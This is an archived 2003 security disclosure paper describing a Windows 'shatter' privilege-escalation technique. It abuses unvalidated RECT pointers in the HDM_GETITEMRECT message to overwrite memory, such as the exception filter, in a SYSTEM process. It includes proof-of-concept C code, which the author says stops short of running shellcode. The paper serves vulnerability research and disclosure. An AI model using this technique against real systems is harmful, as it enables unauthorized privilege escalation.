exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

shatterSEH.txt

shatterSEH.txt
Posted Jul 14, 2003
Authored by Brett Moore SA | Site security-assessment.com

Paper discussing more shatter attacks that are possible using SEH memory locations to escalate privileges in Windows. Related information available here.

tags | paper
systems | windows
SHA-256 | 08eeaae0ef4d604d10152e302c4788b1eb3339d71fd9c5a793d9b0e5a67d44e0

shatterSEH.txt

Change Mirror Download
=========================================================================
= Shattering SEH
=
= brett.moore@security-assessment.com
= http://www.security-assessment.com
=
= Originally posted: July 11, 2003
=========================================================================

== Background ==

Since shatter attacks are the bug of the week, I figured I would add some
slightly interesting information to the topic. I'm not going to rehash
the information that is already available, and for those who haven't yet
read the following two articles.

NGSSoftware Insight Security Research Advisory
*http://www.ngssoftware.com/advisories/utilitymanager.txt

iDEFENSE Security Advisory
*http://www.idefense.com/advisory/07.11.03.txt

Those two papers have all the required reading information and links to the
previous shatter attack papers, detailing the use of a callback function to
gain control of an interactive SYSTEM level process.

The technique I am going to describe here is a method allowing a low level
user to overwrite important memory locations in a SYSTEM process. Memory
locations such as SEH etc.

== Detail ==

Various windows messages accept a pointer to a POINT or RECT structure which
will be used to retrieve GDI information about windows. These pointers do
not appear to be validated in any way.

We will concentrate on the HDM_GETITEMRECT message.

(From MSDN)
- HDM_GETITEMRECT Message
-
- Retrieves the bounding rectangle for a given item in a header control.
- You can send this message explicitly or use the Header_GetItemRect macro.
-
- Syntax
-
- To send this message, call the SendMessage function as follows.
- lResult = SendMessage((HWND) hWndControl, // handle to control
- (UINT) HDM_GETITEMRECT, // message ID
- (WPARAM) wParam, // = (WPARAM) (int) iIndex;
- (LPARAM) lParam ); // = (LPARAM) (RECT*)
lpItemRect;
- Parameters
- iIndex
- Zero-based index of the header control item for which to retrieve the
- bounding rectangle.
- lpItemRect
- Pointer to a RECT structure that receives the bounding rectangle
information.
-
(End MSDN)

So if we wanted to overwrite the Unhandled Exception Filter @ 77edxxxx we
would call
SendMessage(hwnd,HDM_GETITEMRECT,0,0x77edxxxx)

Now the challenge is how do we control what is been written to the address.

The RECT structure is defined as;
(From MSDN)
- typedef struct _RECT {
- LONG left;
- LONG top;
- LONG right;
- LONG bottom;
- } RECT, *PRECT;
(End MSDN)

The only variable that we are in control of is the right, or width of
the header item. The size is limited though, allowing us only to control
the low order 16 bits of the written value. The high order bits are set
to 0000.

But by offsetting our write address we can control the high order
16 bits of the required value, with the low order bits been set to 0000.

If we can place our shellcode in a place that includes XXXX0000 in the
address then we will be able to land in our shellcode by setting the
header item width to XXXX, causing the write and then causing an
exception.

Pictures are worth a thousand words, so work through this example.

== Example Code ==

/*******************************************************
* shatterseh.c
*
* Example code to demonstrate more shatter attacks
*
* Demonstrates overwriting of critical memory address
* It is example only and doesn't reach the 'shellcode'
* because header sizing is required.
*
* Obviously you need to insert the particular window
* handles required.
*
* Compatible with my win2k SP3.
*
* Brett Moore [ brett.moore@security-assessment.com ]
* www.security-assessment.com
*******************************************************/
#include <windows.h>
#include <commctrl.h>

int main(int argc, char *argv[])
{
long lResult;
long hWndControl,hHdrControl;
char buffer[65535];

// Stuff The Buffer
memset(buffer,0x04,sizeof(buffer));

// Window Title Handle
hWndControl = 0x000C01E6;

// Set The Window Title
lResult = SendMessage((HWND) hWndControl,(UINT) WM_SETTEXT,0,&buffer);

// Listview Header Handle
hWndControl = 0x000E0274;

// Overwrite Something Important
lResult = SendMessage((HWND) hWndControl,(UINT)
HDM_GETITEMRECT,0,0x77EDA1EA);

// Cause Exception
lResult = SendMessage((HWND) hWndControl,(UINT) HDM_GETITEMRECT,0,1);
return 0;
}

== Example Vulnerable Programs ==

None are included here. But other researchers are sure to release the
usual list of suspects.

== Solutions ==

See the iDEFENSE paper for some good solution examples.

== Credit ==

Credit given where due to all previous shatter attack posts/publications.

Brett Moore from security-assessment.com for the discovery/disclosure of
this method.

%-) Wassup to all those who have helped me by not helping me in the past.
%-) This California life-style is treating me well. Bring on Vegas!

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close